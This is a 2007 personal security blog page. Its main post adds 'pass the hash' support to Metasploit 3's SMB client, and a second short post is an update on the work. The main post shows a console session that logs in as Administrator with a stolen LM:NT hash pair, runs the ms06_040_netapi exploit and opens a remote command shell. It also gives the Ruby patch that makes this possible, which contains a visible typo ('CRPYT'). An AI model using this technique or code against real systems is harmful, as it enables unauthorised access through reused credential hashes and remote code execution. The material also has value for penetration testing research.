Superimposing Nothing Nowhere

The internet is littered with wastes of space. This one is no different except that it is my waste of space.

Showing posts with label pass the hash. Show all posts
Showing posts with label pass the hash. Show all posts

Thursday, October 25, 2007

NTLM Hash Update

Things got a little busy/crazy around here so I'm not satisfied with what I have done so far so no code yet. This past weekend was Toorcon 1001 and it was as enjoyable as ever. I had a few breakthrough ideas thanks to the talks and side chats with everybody. That's mostly why I'm not satisfied -- always room for improvement. :)

I promise to show something soon. Really.

at 8:31 AM 0 comments Links to this post

Labels: , ,

Wednesday, May 09, 2007

Pass The Hash Support for Metasploit

Surprisingly Metasploit 3's SMB auth routines didn't support "pass the hash" so I took some time and put it in.

msf exploit(ms06_040_netapi) > set SMBPass 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
SMBPass => 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
msf exploit(ms06_040_netapi) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(ms06_040_netapi) > exploit
[*] Started bind handler
[*] Doing pass the hash.
[*] LM: 6A98EB0FB88A449CBE6FABFD825BCA61
[*] NT: A4141712F19E9DD5ADF16919BB38A95C
[*] Detected a Windows 2000 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.110.130[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.110.130[\BROWSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Command shell session 1 opened (192.168.110.1:42485 -> 192.168.110.130:4444)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
The Patch:

Index: lib/rex/proto/smb/client.rb
===================================================================
--- lib/rex/proto/smb/client.rb (revision 4889)
+++ lib/rex/proto/smb/client.rb (working copy)
@@ -568,8 +568,13 @@

raise XCEPT::NTLM1MissingChallenge if not self.challenge_key

- hash_lm = pass.length > 0 ? CRYPT.lanman_des(pass, self.challenge_key) : ''
- hash_nt = pass.length > 0 ? CRYPT.ntlm_md4(pass, self.challenge_key) : ''
+ if (pass.length == 65)
+ hash_lm = CRYPT.e_p24( [ pass.upcase()[0,32] ].pack('H42'), self.challenge_key)
+ hash_nt = CRPYT.e_p24( [ pass.upcase()[33,65] ].pack('H42'), self.challenge_key)
+ else
+ hash_lm = pass.length > 0 ? CRYPT.lanman_des(pass, self.challenge_key) : ''
+ hash_nt = pass.length > 0 ? CRYPT.ntlm_md4(pass, self.challenge_key) : ''
+ end

data = ''
data << hash_lm
@@ -690,7 +695,11 @@
nonce = CRYPT.md5_hash(self.challenge_key + client_challenge)

# Generate the NTLM hash
- resp_ntlm = CRYPT.ntlm_md4(pass, nonce[0, 8])
+ if (pass.length == 65)
+ resp_ntlm = CRYPT.e_p24( [ pass.upcase()[33,65] ].pack('H42'), nonce[0, 8])
+ else
+ resp_ntlm = CRYPT.ntlm_md4(pass, nonce[0, 8])
+ end

# Generate the fake LANMAN hash
resp_lmv2 = client_challenge + ("\x00" * 16)

at 12:12 AM 0 comments Links to this post

Labels: , ,

Subscribe to: Posts (Atom)